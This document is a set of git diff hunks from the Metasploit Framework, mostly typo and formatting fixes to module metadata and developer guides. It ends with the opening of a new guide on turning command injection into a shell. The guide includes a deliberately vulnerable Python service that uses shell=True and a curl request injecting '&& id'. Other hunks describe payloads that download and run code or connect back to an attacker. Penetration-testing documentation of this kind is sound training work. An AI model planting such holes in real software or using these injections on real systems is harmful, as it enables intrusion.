    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker via a named pipe pivot",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231515,7 +234641,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231559,7 +234685,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -231599,7 +234725,7 @@
    ],
    "description": "Inject a custom native PE file into the exploited process using a reflective PE loader. The reflective PE\nloader will execute the pre-mapped PE image starting from the address of entry after performing image base\nrelocation and API address resolution. This module requires a PE file that contains relocation data and a\nvalid (uncorrupted) import table. PE files with CLR(C#/.NET executables), bounded imports, and TLS callbacks\nare not currently supported. Also PE files which use resource loading might crash.\nConnect back to the attacker with UUID Support (Windows x64)",
    "references": [
-
+      "URL-https://github.com/EgeBalci/Amber"
    ],
    "platform": "Windows",
    "arch": "x64",
@@ -234120,7 +237246,7 @@
    "author": [
      "James Otten <jamesotten1@gmail.com>"
    ],
-    "description": "This module attempts to determine whether the system is running\n          inside of a container and if so, which one. This module supports\n          detection of Docker, LXC, and systemd nspawn.",
+    "description": "This module attempts to determine whether the system is running\n          inside of a container and if so, which one. This module supports\n          detection of Docker, WSL, LXC, Podman and systemd nspawn.",
    "references": [

    ],
@@ -234130,7 +237256,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-07-19 19:47:17 +0000",
    "path": "/modules/post/linux/gather/checkcontainer.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkcontainer",
@@ -234167,7 +237293,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-02-08 13:47:34 +0000",
+    "mod_time": "2023-08-22 12:36:48 +0000",
    "path": "/modules/post/linux/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "linux/gather/checkvm",
@@ -236428,7 +239554,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2023-06-05 14:21:24 +0000",
+    "mod_time": "2023-07-18 14:17:15 +0000",
    "path": "/modules/post/multi/gather/jenkins_gather.rb",
    "is_install_path": true,
    "ref_name": "multi/gather/jenkins_gather",
@@ -240275,9 +243401,11 @@
      "Carlos Perez <carlos_perez@darkoperator.com>",
      "Aaron Soto <aaron_soto@rapid7.com>"
    ],
-    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, Virtual PC,\n          VirtualBox, Xen, and QEMU.",
+    "description": "This module attempts to determine whether the system is running\n          inside of a virtual environment and if so, which one. This\n          module supports detection of Hyper-V, VMWare, VirtualBox, Xen, QEMU,\n          and Parallels.",
    "references": [
-
+      "URL-https://handlers.sans.org/tliston/ThwartingVMDetection_Liston_Skoudis.pdf",
+      "URL-https://www.heise.de/security/downloads/07/1/1/8/3/5/5/9/vmde.pdf",
+      "URL-https://evasions.checkpoint.com/techniques/registry.html"
    ],
    "platform": "Windows",
    "arch": "",
@@ -240285,7 +243413,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-29 21:28:15 +0000",
+    "mod_time": "2023-08-11 14:42:51 +0000",
    "path": "/modules/post/windows/gather/checkvm.rb",
    "is_install_path": true,
    "ref_name": "windows/gather/checkvm",
@@ -93,7 +93,7 @@ One advantage that this directory structure gives us is the ability to write bet

 ### Shared build tasks

-Because all routine module-oriented tasks will be preformed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:
+Because all routine module-oriented tasks will be performed with rake tasks, we will need to make the default actions for these tasks as intelligent and reusable as possible across different module types/implementations. A module author should not have to worry about writing plumbing they do not need (or is common) or messing with plumbing that is only tangentially related to their unique need. To that end, we should have sane defaults for the following at a minimum:

 ```
 rake run -- Start module, hook up stdin/stdout to JSON-RPC
@@ -115,4 +115,4 @@ At the very least, we will also need tooling to create a mostly-empty but runnab

 ### For classic modules

-The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
+The biggest differences for classic modules are metadata generation and running. These can be accomplished with rake tasks, but it would involve starting up a whole framework instance for each module run. For efficiency, we will need to signal to framework to treat the module specially, perhaps having rake deps:check output/return a specific value when the module needs to be run inside of framework. Metadata would then be dumped directly from the framework loader, and instead of rake run, the classic module loader/runner would be run much as it is today. We will probably want to keep the rake tasks for these things for when we don't already have a framework instance handy.
@@ -106,7 +106,7 @@ Enter passphrase: [...]

 2. Modify your `.git/config` file to enable signing commits and merges by default:

-````
+```ini
 [user]
  name = Your Name
  email = your_email@example.com
@@ -114,7 +114,7 @@ Enter passphrase: [...]
 [alias]
  c = commit -S --edit
  m = merge -S --no-ff --edit
-````
+```

 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.

@@ -58,7 +58,7 @@ You probably shouldn't run proof of concept exploit code you find on the Interne

 Also, please take a peek at our guides on using git and our acceptance guidelines for new modules in case you're not familiar with them.

-If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/kb/answer/registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.
+If you get stuck, try to explain your specific problem as best you can on our [Freenode IRC](https://freenode.net/) channel, #metasploit (joining requires a [registered nick](https://freenode.net/view/Nick_Registration)). Someone should be able to lend a hand. Apparently, some of those people never sleep.

 # Thank you

@@ -147,7 +147,7 @@ This method is just a stub on the Base mixin. It will be overridden in each Logi

 For an example let's look at the attempt_login method from `Metasploit::Framework::LoginScanner::FTP (lib/metasploit/framework/login_scanner/ftp.rb)`
 
- ```ruby
+```ruby
 # (see Base#attempt_login)
 def attempt_login(credential)
  result_options = {
@@ -170,7 +170,7 @@ def attempt_login(credential)

  ::Metasploit::Framework::LoginScanner::Result.new(result_options)
 end
- ```
+```
 
 ### scan!

@@ -12,8 +12,10 @@ The pgp signatures below can be verified with the following [public key](https:/

 |Download Link|File Type|SHA1|PGP|
 |-|-|-|-|
-| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
-| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run.asc)|
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.2-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/metasploit-latest-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-windows-x64-installer.exe.asc)|
+| [metasploit-4.22.1-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.1-2023071701-linux-x64-installer.run.asc)|
 | [metasploit-4.22.0-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-windows-x64-installer.exe.asc)|
 | [metasploit-4.22.0-linux-x64-installer.run](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run) | Linux 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.22.0-2023050901-linux-x64-installer.run.asc)|
 | [metasploit-4.21.1-windows-x64-installer.exe](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe) | Windows 64-bit | [SHA1](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.sha1) | [PGP](https://downloads.metasploit.com/data/releases/archive/metasploit-4.21.1-2023011701-windows-x64-installer.exe.asc)|
@@ -28,7 +28,7 @@ Difficulty: 3/5

 ### Enhance Sql Injection Support

-Enable faster implementation of SQL injection based explot modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.
+Enable faster implementation of SQL injection based exploit modules by adding library support for common injection attack vectors. Currently very few sql injection exploits are implemented for Metasploit possibly due to the high complexity of building out injection queries and posting them to a vulnerable URI.

 Difficulty: 3/5

@@ -6,7 +6,7 @@ Mentors: [@zerosteiner](https://github.com/zerosteiner), [@jmartin-r7](https://g

 ### Retain active status of authentication tokens

-Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for regstering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.
+Many testing techniques interacting with web servers such as `XSS` rely on ensuring authentication obtained on a target be kept active. A mechanism for registering and maintaining open authentications identified during a test for the duration of the console session may provide an additional utility to enable more modules to target techniques that need valid authentication to be maintained. One such authentication token would be data retained in a cookie for a web service. This project would lay the groundwork for registering gathered or generated authenticaion tokens against a target to be refreshed and sustained until a console exits, or in some cases across console restarts.

 Difficulty: 2/5

@@ -31,7 +31,7 @@ Difficulty: 3/5

 ### Enhanced LDAP Query & Collection

-When preforming security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 
+When performing security assessment on a network with centralized login such as LDAP or Active Directory these services are sometimes exposed directly on the network. While Metasploit has capabilities to collect various pieces of information from these services when a user has been able to gain code execution inside a target system by utilizing tooling such as `Sharphound` or by leveraging SMB services via the `secrets_dump` module, these methods are somewhat indirect. A network base capability to query exposed services may have value. An interactive terminal plugin allowing users to connect directly to LDAP or Active Directory providing capabilities similar to the existing `requests` plugin could enable users search for valuable information in these services without the need to compromise a target or interact with a secondary service. 

 Size: Medium/Large (Depends on proposal)  
 Difficulty: 3/5
@@ -35,7 +35,7 @@ But of course, to begin, you most likely need a template to work with, and here

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -141,7 +141,7 @@ creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D48
 creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12
 creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
 creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
-## oracle (10) uses usernames in the hashing, so we can't overide that here
+## oracle (10) uses usernames in the hashing, so we can't override that here
 creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
 creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
 ## oracle 11/12 H value, username is used
@@ -149,7 +149,7 @@ creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C
 ## oracle 11/12 uses a LONG format, see lib/msf/core/auxiliary/jtr.rb
 creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
 creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
-## postgres uses username, so we can't overide that here
+## postgres uses username, so we can't override that here
 creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
 ## other
 creds add user:hmac_password hash:'<3263520797@127.0.0.1>#3f089332842764e71f8400ede97a84c9' jtr:hmac-md5
@@ -59,7 +59,7 @@ The current available plugins for Metasploit can be found by running the `load -

 The Alias plugin adds the ability to alias console commands:

-```
+```msf
 msf6 > load alias
 [*] Successfully loaded plugin: alias
 msf6 > alias -h
@@ -87,7 +87,7 @@ Proxies => http:localhost:8079

 Viewing registered aliases:

-```
+```msf
 msf6 > alias

 Current Aliases
@@ -62,9 +62,9 @@ res = @http_client.send_request_cgi({
 The cookies returned by the server with a successful login need to be attached to all future requests, so `'keep_cookies' => true,` is used to add all returned cookies to the HttpClient CookieJar and attach them to all subsequent requests.

 ### `cookie` option
-Shown below is the request used to login to a gitlab account in the [artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)
+Shown below is the request used to login to a gitlab account in the [artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection module](https://github.com/rapid7/metasploit-framework/blob/92d981fff2b4a40324969fd1d1744219589b5fa3/modules/exploits/linux/http/artica_proxy_auth_bypass_service_cmds_peform_command_injection.rb#L115)

-artical\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.
+artica\_proxy\_auth\_bypass\_service\_cmds\_peform\_command\_injection requires a specific cookie header to be sent with a request in order to achieve RCE. By setting a string of the desired header as the value of the `cookie` option, that string is set as the cookie header without any changes, allowing the exploit to be carried out.

 ```ruby
 res = send_request_cgi({
@@ -49,7 +49,7 @@ Here's the most basic example of an auxiliary module. We'll explain a bit more a

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -86,7 +86,7 @@ Because the ```Msf::Auxiliary::Scanner``` mixin is so popular, we figured you wa

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -38,7 +38,7 @@ For debugging purposes, it's always better to turn on the highest level of loggi

 There are mainly five logging methods you will most likely be using a lot, and they all have the exact same arguments. Let's use one of the logging methods to explain what these arguments are about:

-```
+```ruby
 def elog(msg, src = 'core', level = 0, from = caller)
 ```

@@ -50,7 +50,7 @@ And then you are ready to go.

 The first thing you do with ObfuscateJS is you need to initialize it with the JavaScript you want to obfuscate, so in this case, begin like the following:

-```
+```ruby
 js = %Q|
 var arrr = new Array();
 arrr[0] = windows.document.createElement("img");
@@ -82,7 +82,7 @@ So if I want to obfuscate the variable ```arrr```, and I want to obfuscate the s

 In some cases, you might actually want to know the obfuscated version of a symbol name. One scenario is calling a JavaScript function from an element's event handler, such as this:

-```
+```html
 <html>
 <head>
 <script>
@@ -150,7 +150,7 @@ This time we'll do a "hello world" example:

 And here's the output:

-```
+```javascript
 window[(function () { var _d="t",y="ler",N="a"; return N+y+_d })()]((function () { var f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })());
 ```

@@ -24,7 +24,7 @@ int main(void) {
 require 'metasploit/framework/compiler/windows'


-## Save as an exe varibale
+## Save as an exe variable
 exe = Metasploit::Framework::Compiler::Windows.compile_c(c_template)

 ## Save the binary as a file
@@ -119,4 +119,4 @@ int main() {
 outfile = "/tmp/helloworld.exe"
 weight = 70 # This value is used to determine how random the code gets.
 Metasploit::Framework::Compiler::Windows.compile_random_c_to_file(outfile, c_source_code, weight: weight)
-```
+```
@@ -89,7 +89,7 @@ First ensure you are running the Metasploit database, and are running the JSON s

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -118,7 +118,7 @@ Response:

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -155,7 +155,7 @@ Response:

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'content-type: application/json' \
@@ -185,7 +185,7 @@ Response:
 Metasploit modules support running `check` methods which can be used to identify the success of an exploit module, or to run an
 auxiliary module against a target. For instance, with an Auxiliary module check request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -205,7 +205,7 @@ curl --request POST \

 Or an Exploit module check request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'content-type: application/json' \
@@ -240,7 +240,7 @@ The response will contain an identifier which can be used to query for updates:

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -288,7 +288,7 @@ It is possible to poll for module results using the id returned when running a m

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -353,7 +353,7 @@ but the memory is limited to 35mb as the memory datastore used is implemented by

 Request:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Content-Type: application/json' \
@@ -445,7 +445,7 @@ curl --request POST \

 Run the analyze command:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Authorization: Bearer ' \
@@ -491,7 +491,7 @@ Response:

 When analyzing a host, it is also possible to specify payload requirements for additional granularity:

-```
+```sh
 curl --request POST \
  --url http://localhost:8081/api/v1/json-rpc \
  --header 'Authorization: Bearer ' \
@@ -128,7 +128,7 @@ The best way to let the user decide what kind of payload to use is by defining s

 Here is an example targets section from a command injection module:

-```
+```ruby
    'Targets' => [
      [
        'Unix Command',
@@ -279,7 +279,7 @@ msf exploit(cmdstager_demo) > run
 # Flavors

 Now that we know how to use the `Msf::Exploit::CmdStager` mixin, let's take a look at the command
-stagers you can use.  As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to wite a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit.  It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.
+stagers you can use.  As mentioned above there are 2 general approaches to staging an executable on disk: by invoking a command that will download the executable file to disk like wget, curl, or fetch, or by breaking the executable file into pieces and including them commands themselves to write it to disk like echo, printf, or vbs. This delineation can be important, as trying to write a stageless binary payload to disk using a stager that has to include the chunked payload in it will require the execution of dozens of commands, often each one having the signature of the exploit.  It is also useful to know the `printf` flavor is the only flavor that embeds the payload into the commands but does ***not*** use `echo`.

 Available flavors:

@@ -31,10 +31,11 @@ Here is the naming convention for fetch payloads:
 `<cmd>/<platform>/<fetch protocol>/served_payload`
 For example:
 `cmd/linux/https/x64/meterpreter/reverse_tcp` Will do four things:
-1) Create a `linux/x64/meterpreter/reverse_tcp` elf binary to be the served payload.
-2) Serve the above served payload on an HTTPS server
-3) Start a served payload handler for the served payload to call back to
-4) Generate a command to execute on a remote host that will download the served payload and run it.
+
+1. Create a `linux/x64/meterpreter/reverse_tcp` elf binary to be the served payload.
+2. Serve the above served payload on an HTTPS server
+3. Start a served payload handler for the served payload to call back to
+4. Generate a command to execute on a remote host that will download the served payload and run it.


 ## A Simple Stand-Alone Example
@@ -182,7 +183,7 @@ payloads.  All I did was give an array value for the `Platform` value and change

 For the `execute_command` method, nothing changes:

-``` ruby
+```ruby
 def execute_command(cmd, _opts = {})
 populate_values if @sid.nil? || @token.nil?
 uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
@@ -206,7 +207,7 @@ end
 The only change in the exploit method is the use of the more generic `Type` value in the case statement.  Nothing else
 needs to change.

-``` ruby
+```ruby
  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
@@ -221,7 +222,7 @@ needs to change.
 If you have an exploit that already supports Unix Command payloads and you'd like it to support Linux Command payloads
 like Fetch Payloads, you can simply add the `linux` value to the platform array:

-``` ruby
+```ruby
 'Nix Command',
  {
    'Platform' => [ 'unix', 'linux' ],
@@ -330,4 +331,4 @@ present on a system, so the command will be `tnftp` rather than `ftp`.

 #### WGET
 WGET is likely the first choice for a linux-only target.  It supports both HTTPS and HTTP and all Fetch payload options.
-It is ubiquitous on Linux hosts and very standard, making it an excellent choice.
+It is ubiquitous on Linux hosts and very standard, making it an excellent choice.
@@ -20,7 +20,7 @@ When the mixin is included, notice there will be the following datastore options
 * **SSLVerifyMode** - Verification mode: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER. Default is PEER.
 * **Proxies** - Allows your module to support proxies.
 * **ConnectTimeout** - Default is 10 seconds.
-* **TCP::max_send_size** - Evasive option. Maxiumum TCP segment size.
+* **TCP::max_send_size** - Evasive option. Maximum TCP segment size.
 * **TCP::send_delay** - Evasive option. Delays inserted before every send.

 If you wish to learn how to change the default value of a datastore option, please read "[[Changing the default value for a datastore option|./How-to-use-datastore-options.md]]"
@@ -126,4 +126,4 @@ def send_recv_once(data)

  buf
 end
-```
+```
@@ -84,7 +84,7 @@ module Metasploit
      class SymantecWebGateway < HTTP


-        # Attemps to login to the server.
+        # Attempts to login to the server.
        #
        # @param [Metasploit::Framework::Credential] credential The credential information.
        # @return [Result] A Result object indicating success or failure
@@ -68,13 +68,13 @@ def on_request_uri(cli, request)
 end
 ```

-Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provies all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).
+Of course, when you write a Metasploit browser exploit there's a lot more you need to think about. For example, your module probably needs to do browser detection, because it wouldn't make any sense to allow Chrome to receive an IE exploit, would it? You probably also need to build a payload that's specific to the target, which means your module needs to know what target it's hitting, and you have to build a method to customize the exploit accordingly, etc. The HttpServer and HttpServer::HTML mixin provides all kinds of methods to allow you to accomplish all these. Make sure to check out the API documentation (you can either do this by running msf/documentation/gendocs.sh, or just run "yard" in the msf directory), or checkout existing code examples (especially the recent ones).

 To get things started, you can always use the following template to start developing your browser exploit:

 ```ruby
 ##
-# This module requires Metasploit: http://metasploit.com/download
+# This module requires Metasploit: https://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

@@ -37,6 +37,10 @@ The `CheckCode` also supports an optional description which is printed by the fr
 return CheckCode::Appears('Vulnerable component XYZ is installed')
 ```

+`MetasploitModule#check` methods should capture any known `raise` from methods called and return value of class
+`Msf::Exploit::CheckCode`. Basically, that means avoiding the use of `fail_with` or raising exceptions that are not
+handled within the check method.
+
 ## Remote Check Example

 Here's an abstract example of how a Metasploit check might be written:
@@ -54,7 +58,7 @@ def check
  http_body = get_http_body
  if http_body
    if http_body =~ /Something CMS v1\.0/
-      # We are able to find the version thefore more precise about the vuln state
+      # We are able to find the version therefore more precise about the vuln state
      return Exploit::CheckCode::Appears
    elsif http_body =~ /Something CMS/
      # All we can tell the vulnerable app is running, but no more info to
@@ -0,0 +1,210 @@
+If you've found a way to execute a command on a target, and you'd like to make a simple exploit module to get a shell, this guide is for you. Alternatively, if you have access to **fetch** commands on the target (curl, wget, ftp, tftp, tnftp, or certutil), you can use a [[Fetch Payload|How-to-use-fetch-payloads]] for a no-code solution.
+
+By the end of this guide you'll understand how to turn [Command injection](https://owasp.org/www-community/attacks/Command_Injection) into a shell - from here, you can move on to the [[command stager|How-to-use-command-stagers]] article and upgrade your basic `:unix_cmd` Target to a Dropper for all kinds of payloads with variable command stagers.
+
+This guide assumes *some* knowledge of programming (Understand what a class is, what methods/functions are) but expects no in-depth knowledge of Metasploit internals.
+
+## A Vulnerable Service
+
+For the vulnerable service test case, we'll be using a simple FastAPI service. This is very easy to spin up:
+
+1. Install `fastapi[all]` using your preferred Python package manager (a virtual environment is recommended)
+2. Create a file to hold some Python code (I'll call it `main.py`)
+3. Copy the following code into your file:
+
+    ```python
+    from fastapi import FastAPI, Response
+    import subprocess
+
+    app = FastAPI()
+
+    @app.get("/ping")
+    def ping(ip : str):
+        res = subprocess.run(f"ping -c 1 {ip}", shell=True, capture_output=True)
+        return Response(content=res.stdout.decode("utf-8"), media_type="text/plain")
+    ```
+
+4. Start your vulnerable service with `uvicorn main:app`
+5. Test that the application works with `curl`:
+
+    ```sh
+    $ curl http://localhost:8000/ping?ip=1.1.1.1
+    PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
+    64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.7 ms
+
+    --- 1.1.1.1 ping statistics ---
+    1 packets transmitted, 1 received, 0% packet loss, time 0ms
+    rtt min/avg/max/mdev = 16.739/16.739/16.739/0.000 ms
+    ```
+
+6. Test that your application is exploitable - also with `curl`:
+
+    ```sh
+    $ curl localhost:8000/ping?ip=1.1.1.1%20%26%26id
+    PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
+    64 bytes from 1.1.1.1: icmp_seq=1 ttl=58 time=16.6 ms
+
+    --- 1.1.1.1 ping statistics ---
+    1 packets transmitted, 1 received, 0% packet loss, time 0ms
+    rtt min/avg/max/mdev = 16.614/16.614/16.614/0.000 ms
+    uid=1000(meta) gid=1000(meta)
+    ```
+
